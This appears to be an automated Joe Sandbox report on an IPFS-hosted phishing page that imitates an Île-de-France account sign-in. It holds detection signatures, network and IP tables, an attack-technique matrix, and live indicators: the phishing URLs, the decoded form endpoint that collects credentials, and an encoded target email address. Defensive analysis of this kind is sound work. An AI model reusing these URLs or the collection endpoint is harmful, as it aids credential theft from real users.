Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://litnet.com/out?signature=2c1f4fb3a510da55&verify=f0d85a74515d878f9714518b56f64f83c3d478981c8004fd8a36ff05f77ed04b&litnet=domain&url=https://cloudflare-ipfs.com/ipfs/QmbbUyKXzZMtLWL65JBbfeA8HRigpuDZ9sk5XT4xvfvyVx?filename=reqistrer-serversNonniiii.html#YXN0cmlkLnd1cnN0ZXJAaWxlZGVmcmFuY2UuZnI=

Overview

General Information

Sample URL:https://litnet.com/out?signature=2c1f4fb3a510da55&verify=f0d85a74515d878f9714518b56f64f83c3d478981c8004fd8a36ff05f77ed04b&litnet=domain&url=https://cloudflare-ipfs.com/ipfs/QmbbUyKXzZMtLWL65JBbfeA8HRi
Analysis ID:1447735
Infos:

Detection

HTMLPhisher
Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Yara detected HtmlPhish10
AI detected suspicious javascript
Found iframes
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden URLs or javascript code
HTML title does not match URL
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 2412 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://litnet.com/out?signature=2c1f4fb3a510da55&verify=f0d85a74515d878f9714518b56f64f83c3d478981c8004fd8a36ff05f77ed04b&litnet=domain&url=https://cloudflare-ipfs.com/ipfs/QmbbUyKXzZMtLWL65JBbfeA8HRigpuDZ9sk5XT4xvfvyVx?filename=reqistrer-serversNonniiii.html#YXN0cmlkLnd1cnN0ZXJAaWxlZGVmcmFuY2UuZnI= MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 5736 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1968,i,10356222934595195562,2819351198065839367,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
SourceRuleDescriptionAuthorStrings
dropped/chromecache_77JoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    SourceRuleDescriptionAuthorStrings
    2.1.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      No Sigma rule has matched
      No Snort rule has matched

      Click to jump to signature section

      Show All Signature Results

      Phishing

      barindex
      Source: https://cloudflare-ipfs.com/ipfs/QmbbUyKXzZMtLWL65JBbfeA8HRigpuDZ9sk5XT4xvfvyVx?filename=reqistrer-serversNonniiii.html&websrc=VdxUl9l9zz9XJUazwJikOsjZCy5xrbQZ7OVNeXhc52YIF3n6teWakuErye5Lp0boBSXwWXPPcrt2v1N1oDwJ7DqvaRZXhzb3Fpn9e0VGkVPZvn90ZkklbK4Xq0Nfd1KULLM: Score: 9 brands: ILEDEFRANCE Reasons: The URL is highly suspicious as it uses an IPFS (InterPlanetary File System) link, which is uncommon for legitimate websites. The domain does not match the legitimate domain name associated with the brand 'ILEDEFRANCE'. The page contains a login form, which is a common feature in phishing sites to steal credentials. The use of social engineering techniques is evident as the page advises users to verify their email account for security reasons, which can prompt users to enter their credentials without suspicion. DOM: 2.1.pages.csv
      Source: Yara matchFile source: 2.1.pages.csv, type: HTML
      Source: Yara matchFile source: dropped/chromecache_77, type: DROPPED
      Source: https://cloudflare-ipfs.com/ipfs/QmbbUyKXzZMtLWL65JBbfeA8HRigpuDZ9sk5XT4xvfvyVx?filename=reqistrer-serversNonniiii.html&websrc=VdxUl9l9zz9XJUazwJikOsjZCy5xrbQZ7OVNeXhc52YIF3n6teWakuErye5Lp0boBSXwWXPPcrt2v1N1oDwJ7DqvaRZXhzb3Fpn9e0VGkVPZvn90ZkklbK4Xq0NLLM: Score: 8 Reasons: The code contains a base64-encoded URL that, when decoded, points to a potentially suspicious site (nocodeform.io). The presence of a login error message and a default site title related to webmail login suggests that this script could be part of a phishing attempt to steal user credentials. Additionally, the use of a base64-encoded URL is a common tactic to obfuscate malicious links. DOM: 2.1.pages.csv
      Source: https://cloudflare-ipfs.com/ipfs/QmbbUyKXzZMtLWL65JBbfeA8HRigpuDZ9sk5XT4xvfvyVx?filename=reqistrer-serversNonniiii.html&websrc=VdxUl9l9zz9XJUazwJikOsjZCy5xrbQZ7OVNeXhc52YIF3n6teWakuErye5Lp0boBSXwWXPPcrt2v1N1oDwJ7DqvaRZXhzb3Fpn9e0VGkVPZvn90ZkklbK4Xq0Nfd1KUur7oUeGmQg30odhhzIJk95v7I8xTFNCLFUV7p4rUnFMrndGnNZsXO4ZBACm4nwXN6StffF3RFuH3Y2uNRVeXDomF3rLkAu6nwmeafhHsuEy7wFCaUMoMwifyYbmW5s3f1Kk8GhkPGgIxEQQMHYpy8tHUwVIaAo1ar8NTFgTSPyMhjY&dispatch=683&id=793243#YXN0cmlkLnd1cnN0ZXJAaWxlZGVmcmFuY2UuZnI=HTTP Parser: Iframe src: https://www.iledefrance.fr
      Source: https://cloudflare-ipfs.com/ipfs/QmbbUyKXzZMtLWL65JBbfeA8HRigpuDZ9sk5XT4xvfvyVx?filename=reqistrer-serversNonniiii.html&websrc=VdxUl9l9zz9XJUazwJikOsjZCy5xrbQZ7OVNeXhc52YIF3n6teWakuErye5Lp0boBSXwWXPPcrt2v1N1oDwJ7DqvaRZXhzb3Fpn9e0VGkVPZvn90ZkklbK4Xq0Nfd1KUur7oUeGmQg30odhhzIJk95v7I8xTFNCLFUV7p4rUnFMrndGnNZsXO4ZBACm4nwXN6StffF3RFuH3Y2uNRVeXDomF3rLkAu6nwmeafhHsuEy7wFCaUMoMwifyYbmW5s3f1Kk8GhkPGgIxEQQMHYpy8tHUwVIaAo1ar8NTFgTSPyMhjY&dispatch=683&id=793243#YXN0cmlkLnd1cnN0ZXJAaWxlZGVmcmFuY2UuZnI=HTTP Parser: Number of links: 0
      Source: https://cloudflare-ipfs.com/ipfs/QmbbUyKXzZMtLWL65JBbfeA8HRigpuDZ9sk5XT4xvfvyVx?filename=reqistrer-serversNonniiii.html&websrc=VdxUl9l9zz9XJUazwJikOsjZCy5xrbQZ7OVNeXhc52YIF3n6teWakuErye5Lp0boBSXwWXPPcrt2v1N1oDwJ7DqvaRZXhzb3Fpn9e0VGkVPZvn90ZkklbK4Xq0Nfd1KUur7oUeGmQg30odhhzIJk95v7I8xTFNCLFUV7p4rUnFMrndGnNZsXO4ZBACm4nwXN6StffF3RFuH3Y2uNRVeXDomF3rLkAu6nwmeafhHsuEy7wFCaUMoMwifyYbmW5s3f1Kk8GhkPGgIxEQQMHYpy8tHUwVIaAo1ar8NTFgTSPyMhjY&dispatch=683&id=793243#YXN0cmlkLnd1cnN0ZXJAaWxlZGVmcmFuY2UuZnI=HTTP Parser: <input type="password" .../> found but no <form action="...
      Source: https://cloudflare-ipfs.com/ipfs/QmbbUyKXzZMtLWL65JBbfeA8HRigpuDZ9sk5XT4xvfvyVx?filename=reqistrer-serversNonniiii.html&websrc=VdxUl9l9zz9XJUazwJikOsjZCy5xrbQZ7OVNeXhc52YIF3n6teWakuErye5Lp0boBSXwWXPPcrt2v1N1oDwJ7DqvaRZXhzb3Fpn9e0VGkVPZvn90ZkklbK4Xq0Nfd1KUur7oUeGmQg30odhhzIJk95v7I8xTFNCLFUV7p4rUnFMrndGnNZsXO4ZBACm4nwXN6StffF3RFuH3Y2uNRVeXDomF3rLkAu6nwmeafhHsuEy7wFCaUMoMwifyYbmW5s3f1Kk8GhkPGgIxEQQMHYpy8tHUwVIaAo1ar8NTFgTSPyMhjY&dispatch=683&id=793243#YXN0cmlkLnd1cnN0ZXJAaWxlZGVmcmFuY2UuZnI=HTTP Parser: Base64 decoded: https://nocodeform.io/f/65fb2a8c6ec87b8eaeaf62c0
      Source: https://cloudflare-ipfs.com/ipfs/QmbbUyKXzZMtLWL65JBbfeA8HRigpuDZ9sk5XT4xvfvyVx?filename=reqistrer-serversNonniiii.html&websrc=VdxUl9l9zz9XJUazwJikOsjZCy5xrbQZ7OVNeXhc52YIF3n6teWakuErye5Lp0boBSXwWXPPcrt2v1N1oDwJ7DqvaRZXhzb3Fpn9e0VGkVPZvn90ZkklbK4Xq0Nfd1KUur7oUeGmQg30odhhzIJk95v7I8xTFNCLFUV7p4rUnFMrndGnNZsXO4ZBACm4nwXN6StffF3RFuH3Y2uNRVeXDomF3rLkAu6nwmeafhHsuEy7wFCaUMoMwifyYbmW5s3f1Kk8GhkPGgIxEQQMHYpy8tHUwVIaAo1ar8NTFgTSPyMhjY&dispatch=683&id=793243#YXN0cmlkLnd1cnN0ZXJAaWxlZGVmcmFuY2UuZnI=HTTP Parser: Title: Sign in iledefrance account does not match URL
      Source: https://cloudflare-ipfs.com/ipfs/QmbbUyKXzZMtLWL65JBbfeA8HRigpuDZ9sk5XT4xvfvyVx?filename=reqistrer-serversNonniiii.html&websrc=VdxUl9l9zz9XJUazwJikOsjZCy5xrbQZ7OVNeXhc52YIF3n6teWakuErye5Lp0boBSXwWXPPcrt2v1N1oDwJ7DqvaRZXhzb3Fpn9e0VGkVPZvn90ZkklbK4Xq0Nfd1KUur7oUeGmQg30odhhzIJk95v7I8xTFNCLFUV7p4rUnFMrndGnNZsXO4ZBACm4nwXN6StffF3RFuH3Y2uNRVeXDomF3rLkAu6nwmeafhHsuEy7wFCaUMoMwifyYbmW5s3f1Kk8GhkPGgIxEQQMHYpy8tHUwVIaAo1ar8NTFgTSPyMhjY&dispatch=683&id=793243#YXN0cmlkLnd1cnN0ZXJAaWxlZGVmcmFuY2UuZnI=HTTP Parser: <input type="password" .../> found
      Source: https://cloudflare-ipfs.com/ipfs/QmbbUyKXzZMtLWL65JBbfeA8HRigpuDZ9sk5XT4xvfvyVx?filename=reqistrer-serversNonniiii.html&websrc=VdxUl9l9zz9XJUazwJikOsjZCy5xrbQZ7OVNeXhc52YIF3n6teWakuErye5Lp0boBSXwWXPPcrt2v1N1oDwJ7DqvaRZXhzb3Fpn9e0VGkVPZvn90ZkklbK4Xq0Nfd1KUur7oUeGmQg30odhhzIJk95v7I8xTFNCLFUV7p4rUnFMrndGnNZsXO4ZBACm4nwXN6StffF3RFuH3Y2uNRVeXDomF3rLkAu6nwmeafhHsuEy7wFCaUMoMwifyYbmW5s3f1Kk8GhkPGgIxEQQMHYpy8tHUwVIaAo1ar8NTFgTSPyMhjY&dispatch=683&id=793243#YXN0cmlkLnd1cnN0ZXJAaWxlZGVmcmFuY2UuZnI=HTTP Parser: No <meta name="author".. found
      Source: https://cloudflare-ipfs.com/ipfs/QmbbUyKXzZMtLWL65JBbfeA8HRigpuDZ9sk5XT4xvfvyVx?filename=reqistrer-serversNonniiii.html&websrc=VdxUl9l9zz9XJUazwJikOsjZCy5xrbQZ7OVNeXhc52YIF3n6teWakuErye5Lp0boBSXwWXPPcrt2v1N1oDwJ7DqvaRZXhzb3Fpn9e0VGkVPZvn90ZkklbK4Xq0Nfd1KUur7oUeGmQg30odhhzIJk95v7I8xTFNCLFUV7p4rUnFMrndGnNZsXO4ZBACm4nwXN6StffF3RFuH3Y2uNRVeXDomF3rLkAu6nwmeafhHsuEy7wFCaUMoMwifyYbmW5s3f1Kk8GhkPGgIxEQQMHYpy8tHUwVIaAo1ar8NTFgTSPyMhjY&dispatch=683&id=793243#YXN0cmlkLnd1cnN0ZXJAaWxlZGVmcmFuY2UuZnI=HTTP Parser: No <meta name="copyright".. found
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49730 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49731 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.16:49732 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.16:49737 version: TLS 1.2
      Source: chrome.exeMemory has grown: Private usage: 27MB later: 35MB
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
      Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
      Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: global trafficDNS traffic detected: DNS query: litnet.com
      Source: global trafficDNS traffic detected: DNS query: cloudflare-ipfs.com
      Source: global trafficDNS traffic detected: DNS query: ik.imagekit.io
      Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
      Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
      Source: global trafficDNS traffic detected: DNS query: logo.clearbit.com
      Source: global trafficDNS traffic detected: DNS query: www.iledefrance.fr
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49730 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49731 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.16:49732 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.16:49737 version: TLS 1.2
      Source: classification engineClassification label: mal60.phis.win@16/18@22/201
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://litnet.com/out?signature=2c1f4fb3a510da55&verify=f0d85a74515d878f9714518b56f64f83c3d478981c8004fd8a36ff05f77ed04b&litnet=domain&url=https://cloudflare-ipfs.com/ipfs/QmbbUyKXzZMtLWL65JBbfeA8HRigpuDZ9sk5XT4xvfvyVx?filename=reqistrer-serversNonniiii.html#YXN0cmlkLnd1cnN0ZXJAaWxlZGVmcmFuY2UuZnI=
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1968,i,10356222934595195562,2819351198065839367,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1968,i,10356222934595195562,2819351198065839367,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire Infrastructure1
      Drive-by Compromise
      Windows Management Instrumentation1
      Registry Run Keys / Startup Folder
      1
      Process Injection
      1
      Masquerading
      OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      Registry Run Keys / Startup Folder
      1
      Process Injection
      LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      Extra Window Memory Injection
      1
      Extra Window Memory Injection
      Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      https://litnet.com/out?signature=2c1f4fb3a510da55&verify=f0d85a74515d878f9714518b56f64f83c3d478981c8004fd8a36ff05f77ed04b&litnet=domain&url=https://cloudflare-ipfs.com/ipfs/QmbbUyKXzZMtLWL65JBbfeA8HRigpuDZ9sk5XT4xvfvyVx?filename=reqistrer-serversNonniiii.html#YXN0cmlkLnd1cnN0ZXJAaWxlZGVmcmFuY2UuZnI=0%Avira URL Cloudsafe
      https://litnet.com/out?signature=2c1f4fb3a510da55&verify=f0d85a74515d878f9714518b56f64f83c3d478981c8004fd8a36ff05f77ed04b&litnet=domain&url=https://cloudflare-ipfs.com/ipfs/QmbbUyKXzZMtLWL65JBbfeA8HRigpuDZ9sk5XT4xvfvyVx?filename=reqistrer-serversNonniiii.html#YXN0cmlkLnd1cnN0ZXJAaWxlZGVmcmFuY2UuZnI=2%VirustotalBrowse
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      about:blank0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      jsdelivr.map.fastly.net
      151.101.129.229
      truefalse
        unknown
        d26p066pn2w0s0.cloudfront.net
        18.239.36.50
        truefalse
          unknown
          cdnjs.cloudflare.com
          104.17.24.14
          truefalse
            unknown
            maxcdn.bootstrapcdn.com
            104.18.11.207
            truefalse
              unknown
              cloudflare-ipfs.com
              104.17.64.14
              truefalse
                unknown
                www.google.com
                142.250.181.228
                truefalse
                  unknown
                  d28h3jm4r3crf8.cloudfront.net
                  18.66.218.102
                  truefalse
                    unknown
                    litnet.com
                    104.18.17.118
                    truefalse
                      unknown
                      idf-edge-proxies-01.cloud.alfa-safety.net
                      217.147.199.227
                      truefalse
                        unknown
                        www.iledefrance.fr
                        unknown
                        unknownfalse
                          unknown
                          ik.imagekit.io
                          unknown
                          unknownfalse
                            unknown
                            cdn.jsdelivr.net
                            unknown
                            unknownfalse
                              unknown
                              logo.clearbit.com
                              unknown
                              unknownfalse
                                unknown
                                NameMaliciousAntivirus DetectionReputation
                                about:blankfalse
                                • Avira URL Cloud: safe
                                unknown
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IPDomainCountryFlagASNASN NameMalicious
                                217.147.199.227
                                idf-edge-proxies-01.cloud.alfa-safety.netFrance
                                25540ALPHALINK-ASFRfalse
                                142.250.186.35
                                unknownUnited States
                                15169GOOGLEUSfalse
                                104.17.24.14
                                cdnjs.cloudflare.comUnited States
                                13335CLOUDFLARENETUSfalse
                                142.250.185.67
                                unknownUnited States
                                15169GOOGLEUSfalse
                                1.1.1.1
                                unknownAustralia
                                13335CLOUDFLARENETUSfalse
                                104.18.17.118
                                litnet.comUnited States
                                13335CLOUDFLARENETUSfalse
                                108.177.15.84
                                unknownUnited States
                                15169GOOGLEUSfalse
                                151.101.129.229
                                jsdelivr.map.fastly.netUnited States
                                54113FASTLYUSfalse
                                142.250.185.110
                                unknownUnited States
                                15169GOOGLEUSfalse
                                18.239.36.13
                                unknownUnited States
                                16509AMAZON-02USfalse
                                18.65.39.61
                                unknownUnited States
                                3MIT-GATEWAYSUSfalse
                                104.18.11.207
                                maxcdn.bootstrapcdn.comUnited States
                                13335CLOUDFLARENETUSfalse
                                172.217.23.110
                                unknownUnited States
                                15169GOOGLEUSfalse
                                239.255.255.250
                                unknownReserved
                                unknownunknownfalse
                                18.239.36.50
                                d26p066pn2w0s0.cloudfront.netUnited States
                                16509AMAZON-02USfalse
                                142.250.181.228
                                www.google.comUnited States
                                15169GOOGLEUSfalse
                                18.66.218.102
                                d28h3jm4r3crf8.cloudfront.netUnited States
                                3MIT-GATEWAYSUSfalse
                                142.250.186.42
                                unknownUnited States
                                15169GOOGLEUSfalse
                                104.17.64.14
                                cloudflare-ipfs.comUnited States
                                13335CLOUDFLARENETUSfalse
                                IP
                                192.168.2.16
                                192.168.2.7
                                Joe Sandbox version:40.0.0 Tourmaline
